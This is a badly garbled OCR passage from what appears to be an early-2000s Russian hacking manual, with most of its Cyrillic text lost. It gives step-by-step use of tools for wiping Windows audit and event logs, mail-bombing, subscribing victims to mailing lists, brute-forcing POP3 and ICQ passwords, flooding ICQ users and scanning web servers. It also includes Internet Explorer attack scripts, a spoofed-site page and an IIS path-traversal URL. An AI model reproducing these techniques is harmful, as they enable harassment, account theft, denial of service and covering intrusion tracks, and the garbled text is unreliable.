C:\Auditpol>auditpol\\ComputerName /disableRunning...Audit information changed successfully on \\ Comp uterName ...
New audit policy on \\ComputerName ...
(0) Audit Disabled
69
-
5/28/2018
72/189
System
Logon
Object Access
Privilege Use
Process Tracking
Policy Change
Account Management
Directory Service Access
Account Logon
= No
= No
= No
= No
= Success and Failure
= No
= No
= No
= No
//ComputerName , /disable . auditpol.exe , , , , ( auditpol /?
).
Windows2000/XP :> (Start)
(Settings Control Panel).File Action View Help
Eve nt Viewer[Local]I T y p eIDescription ISire
Application ErrorR e c o r d 512...
Delete all recordsnthe log
Puc. 4 .7 . Windows
70
-
5/28/2018
73/189
(Control Panel) (Administrative Tools).
(Event Viewer). Event Viewer ( ) (. 4.7).
(Security Log);
. Clear all Events ( ).
, . 4.8, .
Doy ou wantlosa ve "Security"beforeclearing it?Yet No Cancel
Puc. 4.8. > (No), . .
, ! ,
. , elsave.exe ( h tt p :/ / w w w . i b t . k u . d k / j e s p e r / E L S a v e / d e f a u l t. h t m ) . , ,
Windo ws NT 4, W indows 2000. .
C:\els004>elsave s \\ComputerName s , . , . elsave /? , .
, elsave.exe . elsave.exe
W in dows ( (Start), AT MSDOS).
System, .71
-
5/28/2018
74/189
( , ).
, ,
. , , ,
, .
! 50%
( !)
,
,
[9].
, , Norton Personal Firewall, PGP Desktop Security .
,
,
, .
72
-
5/28/2018
75/189
5 # , , , ,
. , , , , , .
, 90 , . , , .
, , , .
, , , TCP/IP.
, .
, , . ,
.
, , ,
(, ).
, . , , , , Word .., , , , .
WWW (World Wide Web ), Web (). Web , Web . 1961 , Web 1992 .
, ,
-
5/28/2018
76/189
. Web
Web ,
, Web.
Web .
Web,
Web URL (UniformResource Locator ),
Web.
,
Web HTTP (Hyper Text Transfer
Protocol ).
, Web,
HTML (Hyper Text Markup Language
).
, ,
,
HTML CGI HTTP.
Web ,
,
Web, ,
,
,
1 Web
.
Web , ,
Web HTML Web,
( browser, ,
, ), Web Web.
HTML Web,
Web,
, , , ,
, , , , .
, HTML
, Web, , Inter
net Explorer(ff i) Netscape Navigator(NN).74
-
5/28/2018
77/189
Web
: Web , HTML Web , , ,
HTML, , Web? HTML?
. ( ) , , Web.
, DoS , Web . , , Web, , .
open ( ), JavaScript M a i nP a g e .h tm l
, HTML 8.1. 8.1. HTML Web
< SCRIPTLANGUAGE* avaScript >generation();function generation(){vard=0;while (true) {
a = new Date;
d =a.getMilliseconds( );window.open( MainPage. html ,d, width=250,height250 );
HTML, , . Windows2000/XP IE 5 IE 6 HTML, .
75
-
5/28/2018
78/189
IE 5 IE 6
.
tlep
. , 8.2
... (
).
8.2. HTML Web
var p=external....;
HTML 8.2 IE 5 6
var p 8.2.
( [3], [10])., ,
HTML .
[3] HTML,
CLSID. 8.3. HTML, .
8.3. HTML
8.3 IE 6 ,
. 5.1.
76
-
5/28/2018
79/189
WebJQC:\Documenl.andSelling*\Alex4M>DocuroenUSWorkD...[)11
. 5.1. HTML C:\Windows\system32\calc.exe,
, .
Web , JavaScript, HTML Web, . , IFRAME, Web .
8.4 HTML, , C:\security.txt. 8.4. Web_
C:\security.txt
alert(" :\n"bdocumentbody nnerText;77
-
5/28/2018
80/189
II.navigate("file://:/Security.txt");setTimeout('Il.navigate(nfile://C:/Security.txt")',1000);
8.4 IE 5 IE 6
,
. 5.2.
. 5.2,
security.txt Web.
,
,
, JavaScript
.
Web
QMd0File Edit View Favorite* Tools Help C:\security.txt
. 5.2. Web
NavigateComplete2, [3]. Webcaumo& Web
, , ,
Web
. ,
Web ActiveX, .
,
,
, , ,
, ,
..
, ,
. ,
.
78
-
5/28/2018
81/189
Web
, Web, . , , .
, Web . , Win dows Web Microsoft
NetBus.
Web, . Web , . 8.7 HTML, .
8.7. HTML
Bubliki&Baranki
functionfalsify(){z=window.open("about:Internet Bubliki&Baranki "); do c ume nt . o p e n();z.document.write ("
-
5/28/2018
82/189
Bubliki&Baranki VirtualAir,
! , Bubliki&Baranki< / H T M L > 8.7 IE 5 ,
. 5.3.
h t t p : / / w w w . B u b l i k i & B a r a n k i . c o r n Rog&Kopito . Web Rog&Kopito
Bubliki&Baranki, Web Rog&Kopito .(, , .) ,
Web Bubliki&Baranki. Web, . 5.4.
Web . 5.4
.
VirtualAir
&;1 V u t u a l A i r , ! ,. Bublild&Baranki
. 5.3. Web Rog&Kopito
File Edit View Favorites Tools Help
Addre ssus) aboutlnternetMara3KHBubikilBaranki Go
VirtualAir
D VirtualAir
IDons | MyComputei
. 5.4. / VirtualAir Bubliki&Baranki
80
-
5/28/2018
83/189
Web
CGI GetCardNumber, Web, Rog&Kopito:
-
5/28/2018
84/189
, .
.
,
,
.
Web, , . :
. , ,
SSL.
Web
.
.
,
, ,
. .
,
. ,
, ,
,
. .
Web .
,
. ,
, ,
,
Web . , Web
, , , , .
, ,
4 IE Netscape, , 5 6
.
, , .
82
-
5/28/2018
85/189
6. , ,
, , , .
, . , , . , , , , , ... , !
(, , , 1, ). , , , , . ? .
( Flood ,) ( Spam , . Spam ). (.. ), , ,
. ,
-
5/28/2018
86/189
SMTP.
Death & Destruction
Email Bomber ( & ) 4.0,
Dn D ( h tt p : / / w w w . so f ts e e k . c o m / U t i li t ie s / V B R U N _ F i le s / ) .
, . , DnD, . Avalanche Avalanche
DnD, . .6.1 DnD 4.O.
Death andDesliuclion4.0File C l o ne s He ad e r Session Random L i s t s Mailing Lilts Window E x t r a s Help
Send bomb to:
Say bombisfrom: ICC:pj
|7|0 Randomly Change | EdilLMessageSubect:I
Message Body:
]0RandomyChange | Edit List|SMTPSpy
jendjombjl|EdilHeaders||Abort||Clear||Clone|fy
Email Bombing is rarely damagingtothetarget but is alwaysdamaging to smtphosts. I do NOTcondone mailbombing as itcauses problems for SysAdmins ofservers. I did not make thisprogram for people to blast awayateachother.PLEASE use itresponsibly, and if you HAVE toemail bomb, then please use theoption to randomly switch serversin betweenmessages;as itlightenstheloads on the server.Havefun anddon'truin a goodsysadmins time by flooding hisserver!
iSizeof BombIBRandomyChange[,Usagestosend:m I Edit Server listJI 1 I O Never ending bomb
20.01.2003. use the Edit He
Puc. 6.1. DnD DnD, , 11.
, ( ).
.
.
84
-
5/28/2018
87/189
DnD Settings(), DnD (. . 6.1).
Dn D Settings ()
:
> SMTP Host ( SMTP) , SMTP,
. SMTP Sword2000.sword.net.
> Spoof Host ( ) , . , .
Randomly Change (
) , SMTP.
> SMTP, Edit Server List (
Random S e r v e i Listorca.esdIH.w||mw.highway1.c| |intetconnect.ne| lhorizQns.netstjohns.edu ]Imalasada.lava. | lpressentef.com| |cyberhighway.n|mail.sisna.com||why.net |widQwmaker.co| Iclubmet.mettob|
wwa.comJ|nyx1G.cs.du.ed||clinet.fi j jcabletegina.co |soi.hypeichalcl rdagobert.rz.unijl lspace.net J |maple.nis.net|tka.com |Iplix.conr Idubmet.metrob|ltMvl.netihZOOO.nel |vitro,com
Puc. 6.2. SM TP
). RandomServer List ( ), . 6.2.
SMTP Random Server List ( ) . Submit().
Size of Bomb ( ) (. 6.1) :
# of messages to send ( ) . 10.
Never ending bomb ( ) .
85
-
5/28/2018
88/189
Checkthebox and then fill in theinformationthatwill appear in theheaders under that category; or uncheck the box toremove it fromthe headers.
XMailer: | XURL: |
XSender: |
XDate: |QReturn Path: [QReferences: | Priority: IQXAuthenlication Warning
| GenerateIP | |124.49.153.SO | [TedGilsdorf
Ok Clear Cancel
Puc. 6.5. MIME
13 , DnD
, .
, ,
.
, Clone ()
EMail bomb ( ) Bomber Spawn 1 (
), . 6.6.
aBomber Spawn1 Sendbombto:Say bomb is from:Message Subject:
Message Body:
SMTP Server:
1l 1 RandomlyChange
| | Random |gRandomly Change
yallnlm|I E d i t H e a d e r s|| Ab or t || Clear j[Status I
{MessagesSent |0 |
Puc. 6.6.
88
-
5/28/2018
89/189
, Bomber Spawn 1 ( ) EMailbomb ( )
SMTP.
,
SMTP.
, !
.
,
, (
).
> , Dn D Clones Load M u l t i Clones ( *
). Number of clones(), . 6.7
Number of clonesHow many clones do youwantto load?
L JPuc. 6.7.
!
> Number of clones ( ) ( 56) .
Bomber Spawn ( ), 1
.
Send Bomb ( ) .
& & ! ,
,
89
-
5/28/2018
90/189
! DnD , , Mailing lists ( ). Subscribe
joe lamer to mailing list( ), . 6.8, , Euro Queer ( ), Mormons (), Family Medicine
( ) !
*i S u b s c r i b e jo elamei to a mailing list! 1=1Subscribeyourenemyto a mailing list evenworsethen amailbombMorelistscoming nextversion..sorrylor the smallquantity(hislime.My apologies for the badusab ilitybut I will use checkboxes instead of option boxesnextversion..
Jewish List CMd Parenting Targetsemail address: [ Digital Queers GayQuakers Targetsfits name: |0hn Mormons Christianity Targets last name: | Gay/Lesbian womanism Lesbiansover 40 BiAustralians Euro Queer people FamilyMedecine Allergies
Puc. 6.8. DnD DnD . TargetEmail Address ( ), Subscribe em() . , .
, , DnD , , , . , Extras Pword generator ( * ). Randomic Password Generator ( ), . 6.9.
, How many characters? (?) ( 8 ) : Use Both ( )
, Use numbers ( ) 90
-
5/28/2018
91/189
*Randomic P a s s w o i d Geneialor Juslclick to generate arandompassword. Choose how longyou want it to beb ythenumberolcharacters.How many characters? [12 | Use Both Use numbers Use letters
6i2i9e1m5p8i
Close Clearbox
Useletters ( ) . , ,
.
Extras ()
69 SMTP ( SMTP Remote ( SMTP)), ( Raw Port ( )). , ( , SMTP). Other Tools( ) . , ,
.
, ; . , , . , ( ). , .
. , , (IMAP) , . .
Brutus Authentication Engine Test 2(Brutas , 2), Brutus AET2 ( h t t p : / / w w w . h o b i e . n e t / b r u t u s ) . . 6.10
Brutus, , FTP, HTTP, Telnet
NetBus.91
-
5/28/2018
92/189
1
IBiulusAE T2 www.hoobie.net/biutu: (January2000) (SisJElie Tools HelpTarget |127.0.0.1 | Ti"pe|POP3 |~| | Start | Stop [ C l e a r
Port (110 | Connections 10 Timeout}10 UseProxy|Drf||B?S..?.P.9.?.|DTrytostayconnectedfor [Unlimite||attempts
. . .0 Use Username SingleUsef Pass Mode[Word List"p|UserFile|users.txt ||Browse|passpje jwords.txt ||Browse|
Positive Authentication ResultsTarget I Type I Username I Password I
5J | ) R*c AuthSeq Throttle QuickKII II ll>dle
Puc.6.10. Brutus , Brutus ( 8 Brutus IIS). , alex1.sword.net, k o l ia . , ,
, .
.
Brutus 2 (. 6.10) Target () , alex1.sword.net.
> () , .
Connection Options ( ) Use Proxy ( ), .
> Authentication Options ( ) Single User( ) .
92
-
5/28/2018
93/189
User file ( ) , .. k o l ia .
> Pass Mode ( ) Brute Force( ). B rutus , .6.11.
X Bi utus 2 w w w . h o o b i e . n et / b iu l u i t (January 2 000JFile Tool. Help
Target |alex1.sword.net
nnectionO ptioru> o r l [110 | ConnectionsType| P OP 3 [T|| Start|Slop | Clear |
I 10 Timeout I 10 Use Proxy I DefineIPSOptions
| Modifysequence|T r y toslayconnectedfor|Untml8|r| attemptsAuthenticationOptions
0 UseUsemame 0Single UserUserlD | kolia
Pass Mode[BruteForce|1 |[Kange|||Dfellfcuted |
Positive AuthenticationResultsTarget I Type I Username|P a ssw or d |
Rtet AuthStq Throttle QuickKil
Puc. 6.11. Brutus POPS Range(). Range () Brutus BruteForce Generation (Brutus ),
.6.12.BiutusBiuleFoiceGeneration
Digits only
Lowercase Alpha
Uppercase Alpha
Mixed Alpha
Alphanumeric
FullKeyspace
MinLength[Max Length [4 [T
Cancel
Custom Range |etaoinsrhldcumfpgwybvkxjqzl234567890! |
Puc. 6.12.
93
-
5/28/2018
94/189
Brutus Brute Force Generation (Brutus ) , , . , , M in Length ( ) 3, Max Length( ) 4. , Digits only
( ). .
> Start () Brutus 2 Brutus 2. . 6.13.
X Uiutus 2 w w w . h o o b i e . n e t / b i u t u s [Januaiy2000JFile Took Help
1 = 1 Target|alex1.sword.net Type|POP3 EJ| Start | Stop | Clear|
iConnectionOption*Port [110 | ConnectionsI
10 Timeout 10
rPOl
I ?P3Options
| Modifysequence | D Trytostayconnectedfor|Unimte| >| attemptsAuthenticationOptions
El Use Username 0 Single UserUserlD [kolia
PassMode [Brute Force[ I Range DisllbAedPositive Authentication Results
Target I Type | Usernamealex1.sword.net POP3 kolia I Password I0007
Positive authentication atalex1 .sword.netwith User: kolia Password: 0007(10997attempts
10997 Uikolia P:0000Timeout Reject
~]|37Attemptsper second | Throttle Quick IdlePuc. 6.13. 1.
Positive Authentication Results ( ) , kolia 0007. , Brutus 10997 alex1.sword.net ( 11000). 5 Pentium 3 1000 , Ethernet 10 /.
,
, Brutus ( 94
-
5/28/2018
95/189
). , , , ( 8 ), , (, &$ ..). ! Brutus Brute Force Generation (Brutus ) 8 ,
Full Keyspace ( ). Start() Brutus 2 6 095 689 385 410 816 , !
12 ?
, , , (., , [10]). Brutus,
PassMode ( ). ( 100 000), , . , password, p a r o l , MyPassword Web
.
, , , Ethernet, 3050 / ( ). . , , , , .
. , , , , , . . , .
95
-
5/28/2018
96/189
IIS Brutus 8 , . , , . , , ,
, ! : . .
, , , . 1, , , , . , , , , . , ( ),
.
, , . . , TFTP 11 , 11 . , TFTP , . TFTP , ,
, . , , , , , .
. , ,
96
-
5/28/2018
97/189
( ) . , , , Web .. ( , ).
. , , ,
. . , .. , , , . , ..
, . , 2002 ., , , . Web. . . . .. ( ). Web, , ?, . , , ?, ?, ? . , , , , . , , , , ,
. , , , , repa_parenaia, !
. , ,
, ,
. 97
4 5830
-
5/28/2018
98/189
, , ,
, .
.
,
.
,
. , (
) ,
.
,
8 ( 12) , , .
,
Dn D. .
,
, Norton Antivirus
M a c A f e e VirusScan. ,
PGP Desktop Security.
,
.
, , , , .
, .
98
-
5/28/2018
99/189
7 .
ICQ ICQ Intelligent Call Query,
.
ICQ [] : I Seek You ; , ICQ . ICQ
,
1998 Mirabilis,
( 40 ) AOL.
ICQ ,
ICQ ,
, .
, , ICQ,
,
. , , .
ICQ ,
ICQ.
ICQ , ICQ, ,
http://www.ICQ.com, http://mirabilis.com. ICQ ICQ , ,1998,1999,2000,2002, ICQ 2003. ICQ
UDP, 4000,
TCP, .
, ICQ,
UIN(Unique Identification Number ). UTN ICQ ,
.
, ICQ?
ICQ ,
. , ? .
-
5/28/2018
100/189
, ICQ, . ,
ICQ ICQ .
, ICQ,: , UIN ,
, . , ICQ , ICQ . , , .
I C Q , , IP I C Q , , . ,
, DoS, 9 . , IP ICQ, , I CQ .
! , I C Q , . , , ,
, .
ICQ, Mirabilis . ICQ,
ICQ , .
, .
100
-
5/28/2018
101/189
ICQ
ICQ
. , ICQ
ICQ ICQ. , ICQ ;
, I C Q (, LameToy www.mirabilis.com). , ( ) , .
, , ,
, , . , ICQ.
. . Sword2000
IC Q Gro upwar e Serve r, A l e x ICQ Groupware Client, UESf, 1001, 11 , UIN, 1003. ICQ Groupware http://www.icq.com. ICQ, ICQGroupware, , , 1. , ICQ , ICQ . ICQ I CQ ,IC Q , I C Q .
101
-
5/28/2018
102/189
UIN ICQ UIN ICQ, , UIN . UIN . , , . , .
, , . ( ) LameToy for ICQ(DBKILLER), , , ( http://icq.cracks.ru/attack.shtml). LameToy for ICQ , , .
LameToy for ICQ. . 7.1 , LameToy for ICQ.
LameToy Fo r Ic q [ D B K I L L E R ] 1| Send [ Slop | | Update; | Menu | | Hide [f ExitLoseiL L M Z . JQ044JI P o t t Scarmei|
Selling [NormalMessageMUlNSniffer
1 I GetLocalIP11501[SendeimiNBIiOOlIPasswdL l|URL|hHp:/VMesssage
Puc . 7.1. LameToy for ICQ DBKILLER) ICQ
LameToy for ICQ (DBKILLER) Send (). , Setting() Loop () , . UIN, UIN# Ran (Random 102
-
5/28/2018
103/189
ICQ ). , , , , .
, ICQ, , UIN UIN. , ICQ (ICQ99a
ICQ99b) . DB( ) , DB Data Base , , DB NewDB. LameToy , DB killer ( DB) Setting (). ICQ,
.
, , LameToy, UIN , , , System Messenger ICQ Team ( h t t p : / / w w w . i c q i n f o . r u / s o f tj c q t e a m . s h t m l ) , ICQ Sucker .
lf~ac)pecaICQ DoS ( ) , . , , , Advanced ICQ IPSn iffe r ICQ Team ( Web, , http://www.icqinfo.ru/sofl_icqteam.shtml). . 7.2 Advanced ICQ IP Sn iffer.
Adv anced ICQ IP Sniffer aaa'Your UIN: [207685174|Password:IJUIN to check: |123456783 Clear list Saver
Cheek Timeout.Tiyagain.
ExtIP:|
Status: || IntIP: ||TCPFIa9: |
| TC PPott: |0| TCPVersion: |0
Puc. 7.2. IP ICQ
103
-
5/28/2018
104/189
IP ICQ UIN, Advanced ICQ IPSniffer ICQ, UIN . , , Your UIN( UIN) Password() Advanced ICQ IP Sniffer ( ICQ). Check () , ICQ
UTN , Info() . , Info () . 7.2 , ( ) IP ICQ, TCP, ICQ . , , Ext IP ( ), IntIP ( IP) TCP Port ( TCP). , ICQ ( ). ICQ, Advanced IP ICQ Sniffer,
ICQserver's address and port( ICQ), Server () .7.3.
ICQ server'saddress andport 3Address: licq.rnirdbilis.com
Port: [4000 || | OK|
| Cancel |
. 7 . . ICQ server's addressandport( ICQ) ICQserver's ad
dress and port ( ICQ) Mirab ilis ICQ 4000. , / IP / .
ICQ, , , I C Q , I C Q ICQ. , ,
. , ICQ, ICQMult iWar(http://www.paybackproductions.com/), ICQ Flooder(.7.4).
104
-
5/28/2018
105/189
I C Q
ICQ F l o o d e rFile
Victim'saddress: 127.0.0.1 | ICQ Port [1027El Randomly generated UINAppatenlsource UIN:QNo.ol Messages: |1 [Message:
E at this!
ICO Flooder 1.2 Copyright (C) 1998dphmanand Implant ManPuc. 7.4. ICQ
ICQ Flooder, .> V i c t im ' s address ( ) IP
ICQ.
> ICQport ( ICQ) TCP.> , UIN .
:
U T N Randomly generated UIN( UIN), UIN UIN.
UIN Apparent source UIN( UIN ) UIN, ICQ .
No. of Messages ( ) ICQ.
> Message () ( , ).
> Send! () .
, ICQ, ,
,, 105
-
5/28/2018
106/189
http://mht.hut.ru/icq/icq.html, ( , ,
ICQ , ).
ICQ ,
, , ! ICQ ICQ,
ICQ,
,
. ,
,
.
, , ICQ s u b M a c h in e G u nv1.4(http://icq.cracks.ru/best.shtml), . 7.5.
OICOSubMachineGunv l . 4by uDFile Settings About[Bruteforce]
[...[13Single[~~]Single
About
Agent
Force!
||(c)uD .Moscow 2 Q O 1Puc. 7.5. ICQ subMachineGun
U1N ICQ
106
-
5/28/2018
107/189
ICQ
bruteforce , ,
.
. ICQ ICQ subMachineGun .
> ICQ subMachineGun.> Settings * Connections&Cracking (
&). , . 7.6.
icq server port
[ Cracking]13Stop ifsuccessful... Make log of cracked uins0 Reconnect if timeout0 Cut passwds length to 8 digits
settimeout:relogln ; times
Cancel OKPuc. 7.6. U1N
icq server( ICQ) ICQ,
, I C Q L m i r a b i li s. s e r v e r . port ()
4000.
Cracking () :
Stop if successful ( ) ICQ.
Make log if cracked uins ( UIN) ICQ.
107
-
5/28/2018
108/189
Reconnect if timeout ( ) ICQ .
Cut password length to 8 digits ( 8 ) 8 .
> set timeout ( ) 15 .
> relogin ( ) ICQ 3.
ICQ s u b M a c h i n e G u n UIN . .
> ICQ subMachineGun Bruteforce( ) UIN. . Single
() UIN, .
Single() UIN.
UIN, (...) Making victims list ( ),
. 7.7.
Making victims list ( ) Range () , , UIN( 100000) ( 900900).
IHint:use Del to remove uins from listPuc. 7.7.
UIN
step () UIN ( 100). Generate() UIN; .
108
-
5/28/2018
109/189
ICQ
, Generate () UIN, , , .. Add () U IN .> UIN,
Open () UIN ( UIN ).
> UIN , t0*" . Clear () UIN ( ).
UIN, . .
> ICQ s u b M a c h i n e G u n Bruteforce ( ) . .
Single ()
, .
Single () .
, (...) Make passlist( ), . 7.8.
Make passlist ( )
.> Open ()
( ). , ICQ.
Use Del to remove passwords fromlistPuc. 7.8.
v Generato r ( ) Add (). , .
109
-
5/28/2018
110/189
> ,
0*"**]. Clear() ( ).
> , . .
Force (). , ICQsubMachineGunv1.4 (. 7.9).OICQ SubMachineGunv l 4 byu DFile Settings About
[Bruteforce][] 0 Single[~~] D Single
Abo ut
Agent
Puc. 7.9.
ICQ subMachineGunv1.4, UIN, ( , . 7.9 ). , , 15 , ICQ. 45 , ( ). ,
, , , , .. . ...110
-
5/28/2018
111/189
ICQ
( , , ICQ . ICQ , ICQ
. , ? ! , ? , ICQ , . , .
? , Windows. , . , ICQ , ICQ. I C Q , , ElcomSoft Advanced ICQ Password Recovery(http://www.elcomsoft.com).
, . . 7.10 Advanced ICQ PasswordRecovery.
31.01.20032:05ACQPR1.0launched,registeredversion
6.COPR1.0(cl2000PleaGoriunovandAndy Malvshev.ElcomSoflCo. LPuc. 7.10. ICQ .dat
ICQ, Advanced ICQ Password Recovery ( ICQ) .dat, ICQ.
111
-
5/28/2018
112/189
ICQ Password successfully found !
ICQ version:99b2000bUINpassword:
%CopytoClipboard fij ClosePuc. 7 .11 .
!
, , ICQ2002 2002. 2002 , UIN .dat,.., , 207685174.dat
(207685174 UIN ). ICQ Password successfully found! ( ICQ ), (.7.11). . 7.11, ICQ 99b 2000b, ICQ 2002 ( ).
, ICQ , , ICQ . , ,
(.[11]), Web (. 8). , , , .
, ICQ( ) , . , , , ICQ. , , ICQ , . , .
ICQ, . . , , I C Q
ICQ . , ICQ , UIN .
112
-
5/28/2018
113/189
ICQ
?
, , ,
,
. ,
, , , , , , ,
. ICQ , , ,
,
, ,
, ,
.
,.. ICQ, , ,
. ,
ICQ ICQ,
ICQ ( , ICQ Team
(http://www.lcqteam.com)). I C Q ICQ, ICQ ICQ.
, .
, ? ,
, . ,
,
? , ... , ,
, .
ICQ,
,
.
ICQ , .
ICQ ,
113
-
5/28/2018
114/189
ICQ. ICQ
DoS ... .
ICQ
. , ,
ICQ, ICQ, I C Q . ICQ,
ICQ. IP
, ,
ICQ.
ICQ .
, ICQ, UTN
. , ICQ, , , BlacklCE Defender, DoS.
, , .
,
. ,
ICQ
.
, ICQ, ICQ.
, IP ICQ,
. ,
.
, . ICQ
, PGP Desktop Security 2.9,
ICQ . ,
PGP ( [7]).
114
-
5/28/2018
115/189
8. Webcaumoft Web? , Web ,
. Web , Web . , , , .
, Web , , , , . HTML Web ( ), , . HTML . ( ).
, Web, ,Web, , . HTTP, , , . Web, , .
, Web, DoS , , Yahoo. , Web,
, ( ) Web , . Web , .
W e b~ caum a Web Web , , Web, Web,
-
5/28/2018
116/189
, .
Web Web, Web . Web ,
Web, Web . Web
, .
Web Web,, Internet Explorer (ffi), HTML Web, HTTP, Web.
Web , IIS Microsoft, Apache HTTP Server Apache Software Foundation
. Web, ASP (Active Server Page ) CGI, , Java SUN, Apache Software Foundation . Web, Web, , . SQL Microsoft, Oracle Oracle .
, , , ODBC (Open Data Base Connectivity
). , , , , , ...
?
1 Web~cauma , Web, . , .
116
-
5/28/2018
117/189
Web
Web , , , , , Web .
Web Web , , TCP 80, , Web,
( CVE, Web),
Web .
Web ASP, Java, CGI , .
Web , , , , ( ). , , .
, , (cookie), , .
Web
, , . , , C G I , CGI , , , .
,
Web , . , Web
, , , .
, , , Web, Web, .
, (, . [])., , ,
, IIS 5. , 117
-
5/28/2018
118/189
( HTTP), C G I ( ) Web
( Web). Web , . IIS , Web, .
, Web , , . , Web. . , FTP
, , .
, .
Web .
Web~cauma , Web, . , , , , .
, , . ,
Web , , , DNS, .
Web.
, .
118
-
5/28/2018
119/189
Web
c p Web
.
.
, ,
,
.
IP, , ,
. Whols . , HTML
Web . HTML
, Web,
, .
, ,
, , JavaScript .
, HTML Web
Web Teleport Pro., , Whols , ,
Web.
w h o i s( Unix), Web ,
whois Web.
W h o l s . , ,
. 1999
Network Solution (http://www.networksolution.com),
, , InterNic(http://www.internic.net).
/ . Web,
Whois ( ),
. Whois , ,
119
-
5/28/2018
120/189
, DNS. , RIPE NCC (Network Coordinate Center ), IP
. Web RIPE NCC (http://www.ripe.net), .8.1.
t@T1Aqp9c|fehltp://www.ripB.net/npen^^ub^^c^ El^|
. 8.1. Web RIPE NCC
IP Web
? DNS .
, SuperScan (http://www.foundstone.com), . 8.2.
SuperScan, .
> Start () .> Stop () .
> Scan type ( ) All list ports from( ).
> Start().
120
-
5/28/2018
121/189
Web
StarlfTMTStop|l.0.0.5
0 Ignore IP zero0 Ignore IP 255Extract from He
Timeout
P'ng|400|Conned
|2000 |Read
14000 I
Resolvehoslnames121 Onlyscan responsive pings[3 Showhost responses Ping only
Every portinlis All selected ports in list(5 All list p o e t s from A l l p o r t s f r om
5 E Z B
. 8.2.
SuperScan . , IP 1.0.0.1 HTTP I I S 5.0, Web. ( ), .
6 shares found on 1 remote hosts.wa 1 . 0 . 0 , 1MyDocumentsN E T L O G O ND
TeslMyDownloadsSYSVOL
M.0.0.1SMyDocumentsM.O.(mNETLOGONM.0.0.1\DM.0.0.1\Tesl.DownloadsM.0.0.1\SYSVOL
Map Drive
. 8.. I I S 5121
-
5/28/2018
122/189
Legion (http://packetstormsecurity.org/groups/rhinoS), 1.0.0.1 . 8.3., IIS 5, ,
? .
II5| I I S , HTTP (Hypertext Transfer Protocol
) CGI (Com mon Ga teway Interface ), I I S , .
HTTP , , [12], Web
. HTTP , GET. Web (, ), GET, , ,http://www.anyserver.com/documents/order.html. order.html /documents IIS,
c:\inetpub\wwwroot\documents.
CGI , , [12], . HTTP, :
http://www.anysite.com/scripts/MyScript?napaMeTp1+napaMeTp2MyScript , /scripts IIS, a ?1+2 , MyScript. I I S , , , .
CGI, ASP(Active Server Pages ) ISAPI (Internet ServerProgramming Interface ). ASP :
http://www .anysite.com/scripts/MyScripts7napaMeTp1 =1& 2=2
122
-
5/28/2018
123/189
Web
MyScript.asp, , , HTML. ISAPI
, ISAPI.
HTTP:
http://www.anysite.com/isapi.111?1&2, IIS, , .
HTTP ,
II S . II S 2.0 :http://www.anysite.eom/.7.7.7.7.7winnt/secret.file Web , secret.txt.
Windows,
ACL.
IIS , Web
[3]. IIS
, ,
, , ,
SecurityLab.ru (http://www.securitylab.ru).
IIS, netcat (http://www.atstake.com), (netcat
[3] netc